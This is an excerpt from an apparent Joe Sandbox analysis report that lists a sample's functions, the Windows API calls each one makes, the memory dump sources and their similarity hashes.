                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                          • _memset.LIBCMT ref: 00165E56
                                                                                                                                                          • GetMenuItemInfoW.USER32(?), ref: 00165E85
                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00165F31
                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00165F5B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 4152858687-4108050209
                                                                                                                                                          • Opcode ID: d2b893db2c201de303536d553f2c2093a43197f41161d68bd8191e7ac4f4fd6e
                                                                                                                                                          • Instruction ID: 55081d0e80369b6a05f296bacc10294300343ef95fd68ae6bfae5b2489103454
                                                                                                                                                          • Opcode Fuzzy Hash: d2b893db2c201de303536d553f2c2093a43197f41161d68bd8191e7ac4f4fd6e
                                                                                                                                                          • Instruction Fuzzy Hash: FD51F131514B12ABD7149B28DC45ABBB7EAAF95350F080A2DF891D31E1EB70CD64C792
                                                                                                                                                          Function 00161050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001610B8
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001610EE
                                                                                                                                                          • 6CA06DE0.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 001610FF
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00161181
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$CreateInstance
                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                          • API String ID: 2994846969-1075368562
                                                                                                                                                          • Opcode ID: 632e73d76807c30c005e02bcc62995cadd616ebf81546aa2e0f5ddf71846d318
                                                                                                                                                          • Instruction ID: 5b589a7ff4c660cc829f5d869cede252fcdfb6b7968ec0361e4292d6a346104a
                                                                                                                                                          • Opcode Fuzzy Hash: 632e73d76807c30c005e02bcc62995cadd616ebf81546aa2e0f5ddf71846d318
                                                                                                                                                          • Instruction Fuzzy Hash: AC414AB1600604BFDB05CF64CC84AAA7BA9EF46354F1984A9EE09DF206D7B1D954CBA0
                                                                                                                                                          Function 00165A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165A93
                                                                                                                                                          • GetMenuItemInfoW.USER32 ref: 00165AAF
                                                                                                                                                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00165AF5
                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E18F0,00000000), ref: 00165B3E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                                                                          • Opcode ID: f66f94b6c435b6e1e75b6843209d779ac4bf19d9a3474cc339c239bffd3eb74b
                                                                                                                                                          • Instruction ID: e19974871129547343b9260462b640a896d78e71e95a05ff6131957aa6140574
                                                                                                                                                          • Opcode Fuzzy Hash: f66f94b6c435b6e1e75b6843209d779ac4bf19d9a3474cc339c239bffd3eb74b
                                                                                                                                                          • Instruction Fuzzy Hash: C341C071204711AFDB24DF24DC84B2AB7EAEF89314F04461DF9A59B2D1D770E810CB66
                                                                                                                                                          Function 00180458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00180478
                                                                                                                                                            • Part of subcall function 00127F40: _memmove.LIBCMT ref: 00127F8F
                                                                                                                                                            • Part of subcall function 0012A2FB: _memmove.LIBCMT ref: 0012A33D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$BuffCharLower
                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                          • API String ID: 2411302734-567219261
                                                                                                                                                          • Opcode ID: c01e8952875990fcc8484e07368126ae761565ad08acc85824ddeeb1bcd041b1
                                                                                                                                                          • Instruction ID: 378bcb5c2769d4120631bb21394d3a123aa1df19d9e00ca5bf05ded1c0ebb7dd
                                                                                                                                                          • Opcode Fuzzy Hash: c01e8952875990fcc8484e07368126ae761565ad08acc85824ddeeb1bcd041b1
                                                                                                                                                          • Instruction Fuzzy Hash: B731B270500619ABCF05EF58D9809EEB7B5FF29310F10862AE476A72D1DB31EA09CF50
                                                                                                                                                          Function 0015C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0015C684
                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0015C697
                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0015C6C7
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$_memmove
                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                          • API String ID: 458670788-1403004172
                                                                                                                                                          • Opcode ID: e83dff2e97a6b3a4f5fc504f7920ef212651664df196a5d557bdaad6ac5c48a4
                                                                                                                                                          • Instruction ID: 617648559fa446c9ffdb4757063626e36cc7854cade1ee4f22b5d4ac5ab09c89
                                                                                                                                                          • Opcode Fuzzy Hash: e83dff2e97a6b3a4f5fc504f7920ef212651664df196a5d557bdaad6ac5c48a4
                                                                                                                                                          • Instruction Fuzzy Hash: DF21F671900204BEDB08AF64D885DFFB7A9DF26311B104119F836EB2E0EB744E4A9790
                                                                                                                                                          Function 001669F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00166A2B
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00166A49
                                                                                                                                                            • Part of subcall function 00166D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00166DBA
                                                                                                                                                            • Part of subcall function 00166D6D: GetLastError.KERNEL32 ref: 00166DC5
                                                                                                                                                            • Part of subcall function 00166D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00166DD9
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166AA4
                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 00166B0C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$AttributesCreateDirectoryErrorFullLastNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                          • String ID: \*.*
                                                                                                                                                          • API String ID: 3499371447-1173974218
                                                                                                                                                          • Opcode ID: 69bbd2412d2ae1a07fe28d6cee5b60dc7558152a65bf8db4b58fd41a9d211429
                                                                                                                                                          • Instruction ID: bdcc48ee3b8c17dd3bb40cecc916e1c45ed669c0f55c00237ddf324e722f43a4
                                                                                                                                                          • Opcode Fuzzy Hash: 69bbd2412d2ae1a07fe28d6cee5b60dc7558152a65bf8db4b58fd41a9d211429
                                                                                                                                                          • Instruction Fuzzy Hash: 2D3161B1800229AACF51EFA4EC45ADDB7B8AF18300F5045EAE509E3151EB349B99CF64
                                                                                                                                                          Function 00174A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174A60
                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00174A86
                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00174AB6
                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00174AFD
                                                                                                                                                            • Part of subcall function 001756A9: GetLastError.KERNEL32(?,?,00174A2B,00000000,00000000,00000001), ref: 001756BE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1951874230-3916222277
                                                                                                                                                          • Opcode ID: 377d3d63a4becd9dc99e59e5cce1e8c4ae2a8a18fcaee533e7969864db86bf24
                                                                                                                                                          • Instruction ID: 315b83184b056d7098796bce4a3003b7742eeb8ecea03f445eb4fdb15c3a1355
                                                                                                                                                          • Opcode Fuzzy Hash: 377d3d63a4becd9dc99e59e5cce1e8c4ae2a8a18fcaee533e7969864db86bf24
                                                                                                                                                          • Instruction Fuzzy Hash: B121BEB5540608BFEB25DFA49C85EBBB6FCEB49748F10801AF10A93540EB70CD458760
                                                                                                                                                          Function 001238E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0019454E
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • _memset.LIBCMT ref: 00123965
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001239B5
                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001239C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                          • String ID: Line:
                                                                                                                                                          • API String ID: 3942752672-1585850449
                                                                                                                                                          • Opcode ID: e54243988dc24c235af78109daa3fb9adb428698d48db38c4ed62f40d5654439
                                                                                                                                                          • Instruction ID: 5434da08a6468e6c18161063f82202e1fef2da7d3098fd79bf6f7d7f532d1f97
                                                                                                                                                          • Opcode Fuzzy Hash: e54243988dc24c235af78109daa3fb9adb428698d48db38c4ed62f40d5654439
                                                                                                                                                          • Instruction Fuzzy Hash: 2731B371408350BBDB21EBA0EC45FDF77E8AB65314F00451EF195825A1DB749AE8CB92
                                                                                                                                                          Function 00188EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013C657
                                                                                                                                                            • Part of subcall function 0013C619: GetStockObject.GDI32(00000011), ref: 0013C66B
                                                                                                                                                            • Part of subcall function 0013C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013C675
                                                                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00188F69
                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00188F70
                                                                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00188F85
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00188F8D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                                                                          • Opcode ID: 51d7eed6ed49606eebb83d9c2c62cd3a5ab57b850526eae3d104cb5923af687b
                                                                                                                                                          • Instruction ID: b56dea197696bf8a9dcdfb61fc37ce7b0e8c6e5b91c50ba06bc92baaabf7210b
                                                                                                                                                          • Opcode Fuzzy Hash: 51d7eed6ed49606eebb83d9c2c62cd3a5ab57b850526eae3d104cb5923af687b
                                                                                                                                                          • Instruction Fuzzy Hash: B221FD71200205AFEF106F64EC80EBB37AEEF59324F904628FB1597190CB31DD909B60
                                                                                                                                                          Function 0016E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0016E392
                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0016E3E6
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016E3FF
                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,001BDBF0), ref: 0016E43D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                          • String ID: %lu
                                                                                                                                                          • API String ID: 3164766367-685833217
                                                                                                                                                          • Opcode ID: bc5cd7fc72658e66f66909c760a5b77cabb499039ee1f45a44b927797e731fd4
                                                                                                                                                          • Instruction ID: a2788f8638c2f5c7c49138ebe304063f49a336f95bed36a9eb2d65ea589f6df5
                                                                                                                                                          • Opcode Fuzzy Hash: bc5cd7fc72658e66f66909c760a5b77cabb499039ee1f45a44b927797e731fd4
                                                                                                                                                          • Instruction Fuzzy Hash: 40218039A40108AFCB10EFA4DC85EEEB7B8EF59714F104069F509D7251E731DA51CB51
                                                                                                                                                          Function 0015D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
